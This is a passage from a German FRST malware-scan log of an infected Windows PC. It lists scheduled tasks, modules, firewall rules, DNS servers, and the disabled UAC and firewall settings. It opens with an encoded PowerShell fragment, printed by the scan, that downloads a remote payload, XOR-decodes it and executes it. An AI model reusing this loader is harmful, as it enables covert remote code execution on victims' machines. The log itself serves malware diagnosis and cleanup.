AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {31DC5647-C6B5-4063-807A-A72F69D45D63} - \Software Updater -> Keine Datei <==== ACHTUNG
Task: {5426EFAF-4CA0-4DA3-A9AD-28A54EC6F284} - System32\Tasks\GS.Enabler-S-4560858878 => c:\programdata\quickset\gs.enabler\GS.Enabler.exe <==== ACHTUNG
Task: {55368616-940A-4AF7-804D-51245CE22881} - System32\Tasks\{421AA2AE-897D-4401-8C3F-8F6F75F2DAB5} => pcalua.exe -a "C:\Program Files (x86)\OscarKB\setup.exe" -d "C:\Program Files (x86)\OscarKB"
Task: {583048ED-2ED1-4603-BF25-199ED530AE45} - \Plus-HD-3.8-firefoxinstaller -> Keine Datei <==== ACHTUNG
Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {5F1B14CE-5EE2-433B-A63B-CD158AC98036} - System32\Tasks\{AC3F90F1-3589-45D4-9B6B-5B6FBB0EDC10} => Chrome.exe hxxp://ui.skype.com/ui/0/6.21.60.104/de/abandoninstall?page=tsMain
Task: {6482C46C-E6B6-4538-AD0C-A6D1D165EEA2} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2013-10-15] (Hewlett-Packard)
Task: {7153B8AC-8C7C-4C80-AA0A-E9E1C5FF61FD} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {732A7531-BD68-47A3-8D63-C991A2113F4A} - System32\Tasks\{7E6714AE-CB5E-4D0B-BB05-E7AC7E6BBEB6} => pcalua.exe -a "C:\Users\VadimSch\Downloads\SIM.CITY.2013[Full.Game+Crack]-SKIDROW\SimCity Install Program.exe" -d C:\Users\VadimSch\Downloads\SIM.CITY.2013[Full.Game+Crack]-SKIDROW
Task: {77CC2607-AE47-488B-ABCD-EF319CDC4905} - \AmiUpdXp -> Keine Datei <==== ACHTUNG
Task: {794B8A92-357D-4ECE-A656-7CC5E478160C} - \Software Updater Ui -> Keine Datei <==== ACHTUNG
Task: {79E317B4-4195-4A10-980B-06E162DCF8B0} - System32\Tasks\Registration => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2011-06-15] ()
Task: {917377D5-8D7D-41D8-B44C-F1C65CB3374B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2013-10-15] (Hewlett-Packard)
Task: {A5F51A78-F3F3-4B21-B155-5903A05B58FD} - System32\Tasks\{DFBAD67B-67E8-4FE2-BD7A-BC164B849A4B} => pcalua.exe -a "C:\Users\VadimSch\Desktop\Minecraft Modinstaller für Timber Mod 1.2.5\Installer Only Windows.exe" -d "C:\Users\VadimSch\Desktop\Minecraft Modinstaller für Timber Mod 1.2.5"
Task: {A65C5B0F-FB4C-4C87-9D00-2431C7E0237B} - System32\Tasks\{74484F2E-F4F0-4858-AF99-82BDC2770C3D} => C:\Users\VadimSch\Desktop\Müll\ResophNotes\ResophNotes.exe [2013-10-14] ()
Task: {A68E0625-1F59-4EC3-9E64-5359E3030F59} - \Plus-HD-3.8-enabler -> Keine Datei <==== ACHTUNG
Task: {A8CCB73B-B1E3-4218-BC7B-A95F6BE04FEA} - System32\Tasks\HPCeeScheduleForVadimSch => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2010-09-14] (Hewlett-Packard)
Task: {AFAA833D-B1B2-419F-A4C1-085311EF8878} - \Lyrics Seeker Update -> Keine Datei <==== ACHTUNG
Task: {B0549E22-05D4-4A63-9717-88F99A370DE6} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {B6432B7B-B8BC-499A-9B5F-7B183DF0E1AB} - System32\Tasks\{C6182E7A-A24E-4059-B66D-A36192DADAEB} => Chrome.exe hxxp://ui.skype.com/ui/0/6.3.60.107/de/abandoninstall?page=tsProgressBar
Task: {BA06335F-56D6-4BF1-A102-4CAF959FBAEF} - System32\Tasks\{04331E31-B124-4797-9429-76A84852B76C} => C:\Users\VadimSch\Desktop\Müll\ResophNotes\ResophNotes.exe [2013-10-14] ()
Task: {BB182608-BC33-4A79-BCC0-9C63F5AE3D0E} - \Plus-HD-3.8-updater -> Keine Datei <==== ACHTUNG
Task: {BF5E5D75-E889-4A8A-8863-F105246F339E} - System32\Tasks\{91BD6770-51E4-4D9A-B86A-42C1A292D3A1} => E:\setup.exe
Task: {C4E899EC-7947-4D91-9121-B39313AF76FF} - System32\Tasks\{81274290-9886-48E3-B0EE-56E4728F9221} => Chrome.exe hxxp://ui.skype.com/ui/0/6.3.0.107/de/go/help.faq.installer?LastError=1638
Task: {C64BFFB3-7146-4DD7-AFB5-28FD1B76A09E} - \Plus-HD-3.8-codedownloader -> Keine Datei <==== ACHTUNG
Task: {C996BD9B-C122-4645-BBC6-13BE3DA7EDEF} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe [2010-11-21] (Microsoft Corporation)
Task: {CB0662CD-F60D-4EE3-91E2-8B9A91DF0D52} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-02] (Adobe Systems Incorporated)
Task: {D680CD16-D4DF-429D-8E93-03357D721515} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-04] (Google Inc.)
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
Task: {E45CBB7F-AA24-4539-B7F2-4B6A429A77C2} - System32\Tasks\SW-Booster-S-792098896 => c:\programdata\trusted publisher\sw-booster\SW-Booster.exe <==== ACHTUNG
Task: {E939BEF1-B536-4C1D-8530-51935714241E} - System32\Tasks\Red Giant Link => C:\Program Files\Red Giant Link\Red Giant Link.exe
Task: {EBCE612F-E8FD-4B9B-B26D-2E6163C7D955} - \Plus-HD-3.8-chromeinstaller -> Keine Datei <==== ACHTUNG
Task: {EE9F3AFD-20B6-4492-B156-AC60885F531C} - System32\Tasks\Open Chrome => Chrome.exe --new-window hxxp://toolbar.avg.com/almost-done?pid=safeguard&amp;lang=de
Task: {EFAB3115-B52B-4B3C-87A4-B678347E95F8} - System32\Tasks\{232BCB1E-E196-4B94-B98B-9379AAA8D54F} => pcalua.exe -a E:\SETUP.EXE -d E:\
Task: {F0143EA3-F409-4CD7-B06B-50D2CB5D3928} - System32\Tasks\{550B7097-CCBE-4449-A350-4C74AC8100D2} => Chrome.exe hxxp://ui.skype.com/ui/0/7.0.0.102/de/abandoninstall?page=tsMain
Task: {F347C8EE-EE71-47BC-86E4-8C269B22540B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-04] (Google Inc.)
Task: {F68D23F3-5790-46FB-864F-CF6996F3F12F} - \GoforFilesUpdate -> Keine Datei <==== ACHTUNG
Task: {FD1C57A8-9475-45C8-ACA8-88258851DCB3} - System32\Tasks\{E7CAF8F2-64C0-4070-BC2A-3B5A30A37074} => pcalua.exe -a "C:\Users\VadimSch\Desktop\TRuNixX\Editing\Editing Pack\Plugins\Twixtor\Twixtor4.59Installer.exe" -d "C:\Users\VadimSch\Desktop\TRuNixX\Editing\Editing Pack\Plugins\Twixtor"

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GS.Enabler-S-4560858878.job => c:\programdata\quickset\gs.enabler\GS.Enabler.exeG/schedule /profile c:\programdata\quickset\gs.enabler\4560858878.ini        VadimSchGS.Ena <==== ACHTUNG
Task: C:\Windows\Tasks\HPCeeScheduleForVadimSch.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\Open Chrome.job => c:\program files (x86)\Google\Chrome\Application\chrome.exeF--new-window hxxp:/toolbar.avg.com/
Task: C:\Windows\Tasks\SW-Booster-S-792098896.job => c:\programdata\trusted publisher\sw-booster\SW-Booster.exeO/schedule /profile c:\programdata\trusted publisher\sw-booster\792098896.ini <==== ACHTUNG

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2013-11-07 01:24 - 2015-08-07 05:34 - 00116344 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2006-12-09 03:55 - 2006-12-09 03:55 - 00022016 _____ () C:\Windows\System32\sugg1l6.dll
2012-04-23 17:22 - 2015-01-30 23:14 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2010-01-02 15:42 - 2010-01-02 15:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2015-03-07 01:07 - 2015-03-07 01:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2015-07-02 01:28 - 2015-07-02 01:28 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 01:07 - 2015-03-07 01:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2015-07-02 01:28 - 2015-07-02 01:28 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2012-01-10 13:41 - 2015-03-30 12:24 - 00568904 _____ () C:\Program Files (x86)\puush\puush.exe
2014-03-17 14:08 - 2015-12-12 11:16 - 02573712 _____ () C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe
2014-07-31 11:16 - 2014-07-31 11:16 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 11:16 - 2014-07-31 11:16 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-26 15:49 - 2015-08-07 12:06 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2013-03-12 17:10 - 2015-11-10 20:55 - 00778752 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-01-20 07:03 - 2015-07-03 17:12 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-01-20 07:03 - 2015-07-03 17:12 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-01-20 07:03 - 2015-07-03 17:12 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2014-05-22 09:56 - 2015-12-14 21:01 - 02547280 _____ () C:\Program Files (x86)\Steam\video.dll
2014-08-29 13:01 - 2015-09-24 01:33 - 02549248 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2014-08-29 13:01 - 2015-09-24 01:33 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2014-08-29 13:01 - 2015-09-24 01:33 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2014-08-29 13:01 - 2015-09-24 01:33 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2014-08-29 13:01 - 2015-09-24 01:33 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2012-04-25 13:25 - 2015-12-14 21:01 - 00804432 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2015-07-22 00:01 - 2015-11-03 23:00 - 00201728 _____ () C:\Program Files (x86)\Steam\bin\openvr_api.dll
2012-04-30 08:55 - 2012-04-30 08:55 - 08358400 _____ () C:\Program Files (x86)\SplitMediaLabs\XSplit\avcodec-54.dll
2012-04-30 08:55 - 2012-04-30 08:55 - 00151040 _____ () C:\Program Files (x86)\SplitMediaLabs\XSplit\avutil-51.dll
2012-04-30 08:55 - 2012-04-30 08:55 - 01152512 _____ () C:\Program Files (x86)\SplitMediaLabs\XSplit\avformat-54.dll
2012-04-30 08:55 - 2012-04-30 08:55 - 00333824 _____ () C:\Program Files (x86)\SplitMediaLabs\XSplit\swscale-2.dll
2012-04-30 08:55 - 2012-04-30 08:55 - 00026112 _____ () C:\Program Files (x86)\SplitMediaLabs\XSplit\swresample-0.dll
2012-11-29 22:59 - 2012-11-29 22:59 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2015-01-13 15:49 - 2010-08-05 14:39 - 00045056 _____ () C:\Program Files (x86)\Thermaltake Ttesports Ultimate\WMINPUT.DLL
2015-12-08 15:22 - 2015-12-08 15:21 - 40500224 _____ () C:\Program Files (x86)\AVG\UiDll\2171\libcef.dll
2015-12-17 00:26 - 2015-12-11 04:54 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll
2015-12-17 00:26 - 2015-12-11 04:54 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll
2015-12-05 10:21 - 2015-12-05 10:21 - 00933056 ____R () C:\Program Files (x86)\Skype\Phone\ssScreenVVS2.dll
2012-04-25 13:25 - 2015-11-17 01:31 - 47846176 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2015-12-24 21:07 - 2015-12-24 07:46 - 16792256 _____ () C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\PepperFlash\20.0.0.267\pepflashplayer.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData:$SS_DESCRIPTOR_SBXNV9VVGV1BFMBGKX6KJDB0TFS69K0B0BPTHRXFSPF7VBCVPJGV
AlternateDataStreams: C:\Windows\Temp:$DATA
AlternateDataStreams: C:\Users\All Users:$SS_DESCRIPTOR_SBXNV9VVGV1BFMBGKX6KJDB0TFS69K0B0BPTHRXFSPF7VBCVPJGV
AlternateDataStreams: C:\ProgramData\Application Data:$SS_DESCRIPTOR_SBXNV9VVGV1BFMBGKX6KJDB0TFS69K0B0BPTHRXFSPF7VBCVPJGV
AlternateDataStreams: C:\Users\VadimSch\AppData\Roaming\Microsoft\Windows\Start Menu\Facebook.website:TASKICON_0news964078814
AlternateDataStreams: C:\Users\VadimSch\AppData\Roaming\Microsoft\Windows\Start Menu\Facebook.website:TASKICON_1messages523453257
AlternateDataStreams: C:\Users\VadimSch\AppData\Roaming\Microsoft\Windows\Start Menu\Facebook.website:TASKICON_2events-954496249
AlternateDataStreams: C:\Users\VadimSch\AppData\Roaming\Microsoft\Windows\Start Menu\Facebook.website:TASKICON_3friends2073392651

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"

==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\Software\Classes\.exe: exefile =>  <===== ACHTUNG
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\Software\Classes\exefile:  <===== ACHTUNG

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2014-03-14 20:48 - 00000860 ____N C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 localhost
::1 localhost

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\VadimSch\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 82.163.142.3 - 95.211.158.130
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist deaktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{BA2E70BE-6565-4782-B69D-F860DFDFB57B}] => (Allow) C:\Windows\system32\ezSharedSvcHost.exe
FirewallRules: [{D15AECBD-B2D2-4B6A-9079-4D7C66DF5FD7}] => (Allow) C:\Program Files (x86)\EasyBits For Kids\ezDesktop.exe
FirewallRules: [{C639CB85-8570-43A2-9686-50BDC913DD6C}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Remote Graphics Receiver\rgreceiver.exe
FirewallRules: [{2B1BCF75-D746-4DE0-BEB2-9E29D57D8D80}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Remote Graphics Receiver\rgreceiver.exe
FirewallRules: [{BD4D699C-198F-41BC-9A72-930829B4BF0A}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP LinkUp\HP LinkUp Viewer.exe
FirewallRules: [{AFF529DF-649D-45A4-B0CB-6982F66F5D18}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP LinkUp\HP LinkUp Viewer.exe
FirewallRules: [{802344B6-DE90-4A3A-AF75-CA5A7D011A77}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{3296EE60-F83F-4E34-A759-3EC2D21E0CD1}] => (Allow) LPort=2869
FirewallRules: [{E47D2509-6668-4244-A34C-A227B969118E}] => (Allow) LPort=1900
FirewallRules: [{44F236D8-D9B8-4F75-847D-58DDE8EC79A1}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{920BE2CC-9CF6-4E48-852C-F1FC22D0C270}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{A2446B82-386A-49CE-ABD7-E078750C144C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D8B7D81C-65F9-42CB-A929-5F35E1D82758}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{079D0106-0DB8-437C-A54B-3368F30A022F}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe
FirewallRules: [{4FF4D7F0-9A48-45B5-8687-53D97A41ABE7}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe
FirewallRules: [{3E54D137-2812-4F44-B4F6-0BB56D8E8D46}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{D3D57D34-1721-4C73-8072-0F1E1421E898}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{D02FE4C1-A8FA-46BE-9285-3BFB7ECC400A}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{068F8BE6-3D3C-4673-996B-2ECCEE664871}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{3B71D135-1CE8-4EE2-AF38-DCEA4FECC692}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{27D0FA07-4D14-4A62-A852-D61B503E92A0}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{AEB87F91-6EBF-4B01-826A-C1FAD7BC406E}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [{08B9B7E4-1AF7-417B-B7BB-B1E0692EED99}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [{965CC735-2C1E-4123-BC62-EC462A0EDE45}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{DB0A432A-DAE8-44B5-8BA2-840E6AE8DC80}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{F4F9D88A-D06E-4858-9ED7-50AE1ACE0721}C:\program files (x86)\utorrent\utorrent.exe] => (Allow) C:\program files (x86)\utorrent\utorrent.exe
FirewallRules: [UDP Query User{C4D89005-699F-4653-84E7-A3768FF49B73}C:\program files (x86)\utorrent\utorrent.exe] => (Allow) C:\program files (x86)\utorrent\utorrent.exe
FirewallRules: [TCP Query User{E4E0FEE0-09DC-4A8D-B702-01E2EC70F0D9}C:\program files (x86)\bittorrent\bittorrent.exe] => (Allow) C:\program files (x86)\bittorrent\bittorrent.exe
FirewallRules: [UDP Query User{9C8788F5-67FF-46CD-B7C8-6C69DB4D1C36}C:\program files (x86)\bittorrent\bittorrent.exe] => (Allow) C:\program files (x86)\bittorrent\bittorrent.exe
FirewallRules: [{BAB81C00-1D71-4BD0-A8B4-9852F4F02679}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{9BC4AF26-EB96-406D-87DF-047434628FA9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E8B10C58-8031-4AC2-8397-0631AC107E4A}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{BE400E88-C8C2-4C93-86D7-4E4846B80B06}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{8831B015-F958-49A4-A9AA-7B903C6861FC}] => (Allow) C:\Program Files (x86)\TeamViewer\Version7\TeamViewer.exe
FirewallRules: [{70C98C5E-324E-4A14-9FE8-188A81EF63AF}] => (Allow) C:\Program Files (x86)\TeamViewer\Version7\TeamViewer.exe
FirewallRules: [{0A43203A-0442-4D65-B8E9-1CCF4595CE6F}] => (Allow) C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe
FirewallRules: [{FCD1EB2D-E96B-488C-8713-13B0B72414AA}] => (Allow) C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe
FirewallRules: [TCP Query User{5EB11229-9D7B-446F-94AD-E562780FE337}C:\program files (x86)\crysis 2.limited edition.v 1.1.0.0\bin32\crysis2.exe] => (Allow) C:\program files (x86)\crysis 2.limited edition.v 1.1.0.0\bin32\crysis2.exe
FirewallRules: [UDP Query User{AE083DC4-547E-49EA-B2D7-396AA46A08E0}C:\program files (x86)\crysis 2.limited edition.v 1.1.0.0\bin32\crysis2.exe] => (Allow) C:\program files (x86)\crysis 2.limited edition.v 1.1.0.0\bin32\crysis2.exe
FirewallRules: [{6D7A4247-E6DC-4489-A883-98BED0E975B9}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{4B78672F-7239-45F2-B18E-634B0EDF6073}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{945C5FE3-E06A-4803-A2C4-41F2EC0D711F}] => (Allow) C:\Users\VadimSch\Downloads\crossfire_downloader.exe
FirewallRules: [{7384118D-FA5C-49C5-8A22-EB811ADCFA9D}] => (Allow) C:\Users\VadimSch\Downloads\crossfire_downloader.exe
FirewallRules: [{D9B10648-7AC7-4D51-8E15-1E4CB1A5D0B2}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [{D10948AE-F301-402D-A9C1-9F155DB3CFF2}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [TCP Query User{FAD96C4A-1C2C-42F0-8614-CF92B47C689B}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{C3160B05-6553-49F0-BC1A-A7933EC35083}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{7E390E37-545C-4E12-B29A-075E1C492624}] => (Block) C:\program files\java\jre7\bin\javaw.exe
